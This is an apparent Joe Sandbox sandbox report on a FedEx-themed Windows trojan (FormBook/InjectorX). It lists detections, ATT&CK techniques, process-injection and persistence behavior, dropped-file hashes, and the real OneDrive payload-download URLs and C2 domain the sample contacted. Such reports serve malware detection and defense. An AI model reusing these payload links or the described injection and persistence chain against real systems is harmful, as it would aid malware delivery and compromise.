          Source: Yara matchFile source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Registry Run Keys / Startup Folder          		811
          Process Injection          		11
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Virtualization/Sandbox Evasion          		LSASS Memory221
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading          		811
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync12
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626183 Sample: FedEx.com Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 44 www.hpbjq.com 2->44 72 Malicious sample detected (through community Yara rule) 2->72 74 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 Yara detected FormBook 2->78 11 FedEx.exe 1 18 2->11         started        signatures3 process4 dnsIp5 58 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49754, 49768 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->58 60 l-0004.l-dc-msedge.net 13.107.43.13, 443, 49753, 49760 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->60 62 3 other IPs or domains 11->62 40 C:\Users\Public\Libraries\Rvsuben.exe, PE32 11->40 dropped 42 C:\Users\...\Rvsuben.exe:Zone.Identifier, ASCII 11->42 dropped 96 Writes to foreign memory regions 11->96 98 Allocates memory in foreign processes 11->98 100 Creates a thread in another existing process (thread injection) 11->100 102 Injects a PE file into a foreign processes 11->102 16 logagent.exe 11->16         started        file6 signatures7 process8 signatures9 64 Modifies the context of a thread in another process (thread injection) 16->64 66 Maps a DLL or memory area into another process 16->66 68 Sample uses process hollowing technique 16->68 70 2 other signatures 16->70 19 explorer.exe 2 16->19 injected process10 process11 21 Rvsuben.exe 14 19->21         started        25 Rvsuben.exe 17 19->25         started        27 WWAHost.exe 19->27         started        29 3 other processes 19->29 dnsIp12 46 onedrive.live.com 21->46 48 l-0004.l-dc-msedge.net 21->48 56 3 other IPs or domains 21->56 80 Multi AV Scanner detection for dropped file 21->80 82 Writes to foreign memory regions 21->82 84 Allocates memory in foreign processes 21->84 31 logagent.exe 21->31         started        50 onedrive.live.com 25->50 52 db-files.fe.1drv.com 25->52 54 7psoug.db.files.1drv.com 25->54 86 Creates a thread in another existing process (thread injection) 25->86 88 Injects a PE file into a foreign processes 25->88 34 DpiScaling.exe 25->34         started        90 Modifies the context of a thread in another process (thread injection) 27->90 92 Maps a DLL or memory area into another process 27->92 94 Tries to detect virtualization through RDTSC time measurements 27->94 36 cmd.exe 1 27->36         started        signatures13 process14 signatures15 104 Modifies the context of a thread in another process (thread injection) 34->104 106 Maps a DLL or memory area into another process 34->106 108 Sample uses process hollowing technique 34->108 110 Tries to detect virtualization through RDTSC time measurements 34->110 38 conhost.exe 36->38         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          FedEx.exe32%VirustotalBrowse
          FedEx.exe59%ReversingLabsWin32.Trojan.InjectorX

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\Rvsuben.exe32%VirustotalBrowse
          C:\Users\Public\Libraries\Rvsuben.exe59%ReversingLabsWin32.Trojan.InjectorX

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          12.3.Rvsuben.exe.39f6370.345.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.388f8d8.78.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f5e50.321.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3897e24.385.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a0fe80.401.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38afd50.394.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a14008.465.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38a8008.109.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f8008.116.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b0008.412.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39fc008.533.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a179c4.504.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a3ae58.567.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39ee75c.181.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3894708.312.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a0c6f8.346.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f3f4c.282.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39ebfec.165.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f6208.325.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b2a78.445.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a177e4.495.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f3f68.288.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39facf8.474.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39fbf24.520.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a2eae4.457.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39ef630.74.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a05ab4.264.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3889914.113.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a226b8.336.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39ebfb8.156.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f7d50.147.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39e8ba8.26.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a114e4.417.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a46300.318.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a04008.256.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39fbf78.524.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39eff28.231.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3897f88.159.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38af950.376.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b761c.484.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39efd08.226.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39e45d4.29.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f8008.117.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39e7360.56.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f7f40.403.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a15398.471.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.389e710.122.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39fa6b4.470.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a0fe80.401.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38afea0.407.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a179c4.502.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f6208.329.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a1d040.574.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3890090.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a1551c.456.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.388ff6c.234.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a3ae0c.562.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38af200.362.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b0008.413.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f95ec.461.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39ef9e0.80.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39fbbf4.493.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38ce514.466.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f6760.133.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f8270.419.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b79c4.502.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.389e4ac.557.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39e7a60.71.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a07040.272.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39ec008.167.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a18008.538.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a07ea0.283.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f5f48.45.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a0fc50.388.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39ef9e0.81.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f44b4.119.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a04008.254.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a07040.270.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39fc49c.541.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f86bc.432.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38a4008.254.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39fbea0.511.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38b26ac.467.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39fbea0.510.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f7904.361.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.388f1b0.185.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.3a2adc4.449.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3899278.414.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f4008.300.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f6ad4.137.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f5e6c.324.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.3a0c6f8.345.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f8b24.439.unpack100%AviraTR/Patched.Ren.GenDownload File
          8.0.logagent.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.3.FedEx.exe.38a7008.266.unpack100%AviraTR/Patched.Ren.GenDownload File
          12.3.Rvsuben.exe.39f7ed8.154.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39ef9e0.82.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.38a75d8.276.unpack100%AviraTR/Patched.Ren.GenDownload File
          14.3.Rvsuben.exe.39f44b4.121.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.3.FedEx.exe.3892a88.257.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          l-0003.l-dc-msedge.net
          		13.107.43.12
          		truefalse
            		high
            l-0004.l-dc-msedge.net
            		13.107.43.13
            		truefalse
              		high
              www.hpbjq.com
              		165.3.110.226
              		truefalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high
                  7psoug.db.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://7psoug.db.files.1drv.com/y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppL4ErfY5FQN7yQ5e8Er7wNoethZZPpye0v7-OBK4AhUUqHfyyPL2MArqnagRFrgHcjasodUbnSfipUTgA205VKAkM6jdwj-Gik53gySQuJl4UaH9ZZ7bt5lPVcB0d0zfIP24kcbexngfNA4ODS-TihkA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1false
                      		high
                      https://7psoug.db.files.1drv.com/y4mXzMyFpM-jvgYM2atIhPeCTn-KOLCtL7U4aJYB1KsLhYlFeUNNY5EZ0sSApCOscVc-to_baaLv-1uq-cP7hO418R6MOZIGvLjtvhiD_mEDnWjp3s9Qsm1jpUq4454e-9uDhTZlrnoLq2DLbIyxL0XkGdDoZeoeSpDv4t2v7vZ0zKXXy9SWLxTnkTTK7PFcdWjAgGOV3jjYEd6kSox2c2hfQ/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1false
                        		high
                        https://onedrive.live.com/download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://7psoug.db.files.1drv.com/FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://7psoug.db.files.1drv.com/9FedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://7psoug.db.files.1drv.com/7FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://7psoug.db.files.1drv.com/DFedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://7psoug.db.files.1drv.com/y#FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://7psoug.db.files.1drv.com/CFedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://7psoug.db.files.1drv.com/y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppLFedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://onedrive.live.com/download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://7psoug.db.files.1drv.com/y4mbREn9_V4vP2iayGOc8Ug-MJsNGUbQ22edGkOo763CxJa0LiZHDGiyIHL8PMA6_CPFedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431008651.0000000000972000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            13.107.43.12
                                            		l-0003.l-dc-msedge.netUnited States
                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            13.107.43.13
                                            		l-0004.l-dc-msedge.netUnited States
                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:626183
                                            Start date and time: 13/05/202217:17:162022-05-13 17:17:16 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 14m 32s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:FedEx.com (renamed file extension from com to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:31
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@17/6@7/2
                                            EGA Information:
                                            • Successful, ratio: 40%
                                            HDC Information:
                                            • Successful, ratio: 100% (good quality ratio 86.9%)
                                            • Quality average: 71.6%
                                            • Quality standard deviation: 33.4%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 34
                                            • Number of non-executed functions: 173
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                                            • Excluded domains from analysis (whitelisted): www.bing.com, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, store-images.s-microsoft.com, login.live.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, sls.update.microsoft.com, odc-db-files-geo.onedrive.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, odc-db-files-brs.onedrive.akadns.net
                                            • Execution Graph export aborted for target FedEx.exe, PID 7084 because there are no executed function
                                            • Execution Graph export aborted for target Rvsuben.exe, PID 6372 because there are no executed function
                                            • Execution Graph export aborted for target Rvsuben.exe, PID 7156 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            17:18:27API Interceptor1x Sleep call for process: FedEx.exe modified
                                            17:18:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rvsuben C:\Users\Public\Libraries\nebusvR.url
                                            17:19:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rvsuben C:\Users\Public\Libraries\nebusvR.url
                                            17:19:03API Interceptor2x Sleep call for process: Rvsuben.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\Public\Libraries\Rvsuben.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\FedEx.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):806912
                                            Entropy (8bit):7.039027640370719
                                            Encrypted:false
                                            SSDEEP:12288:PDVMCvQQIQzSswvpYTT4GhvcQLGSzX9GyT8ipYdaQHOJ0qKcFxilF0uFC1Vv8E:PZpnUpyT4G9cQxxgirOgFNY0y
                                            MD5:917AA80E03E09B1D2B6619CC62CDBE22
                                            SHA1:4124F6FA2D81E4F3DB5BC62099FE4F03F71F091F
                                            SHA-256:57F4CF106379977932D3CA39BFCEB27BF66B55B60465F3A6560D71983709ECEA
                                            SHA-512:74C686B106B5223A16397A4CD97911485B9B7BDBB53ADB9DCFEEA784AB92060679E046F756514C609DF1C789AEA3051C8D9BBB4767D0BEFF9E60D7D55E2F5C55
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Virustotal, Detection: 32%, Browse
                                            • Antivirus: ReversingLabs, Detection: 59%
                                            Reputation:unknown
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................v....................@..............................................@...............................)...`..........................H...................................................................................text............................... ..`.itext.............................. ..`.data............ ..................@....bss....._... ...........................idata...).......*..................@....tls....@............$...................rdata...............$..............@..@.reloc..H............&..............@..B.rsrc........`......................@..@.....................P..............@..@................................................................................................

                                            C:\Users\Public\Libraries\Rvsuben.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\FedEx.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:unknown
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            C:\Users\Public\Libraries\nebusvR.url

                                            Download File
                                            Process:C:\Users\user\Desktop\FedEx.exe
                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Rvsuben.exe">), ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):99
                                            Entropy (8bit):4.946755333360775
                                            Encrypted:false
                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMXXHAICHovsGKdxDKPIv:HRYFVmTWDyzoXpBvsbxuS
                                            MD5:75600FCA22FEC52F7A76D3AFA4E27DE2
                                            SHA1:4653FF3993B18F67FA5E3849174F360DCD386A05
                                            SHA-256:865CB83966999D31AC97499982B10C5A75C92EAA7966F27B55EB20A58FD25430
                                            SHA-512:E4C7CAC59EF9E04C5364E07DC849F2AC6056C49506B5967F5F6955771ABC46A245A26F77EB9F1C3607CE56552BDAE51729071127079A5D217A153D0BB755C91B
                                            Malicious:false
                                            Yara Hits:
                                            • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nebusvR.url, Author: @itsreallynick (Nick Carr)
                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\nebusvR.url, Author: @itsreallynick (Nick Carr)
                                            Reputation:unknown
                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Rvsuben.exe"..IconIndex=91..HotKey=73..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\Rvsubentohcvaxlbphydsofhyldatal[2]

                                            Download File
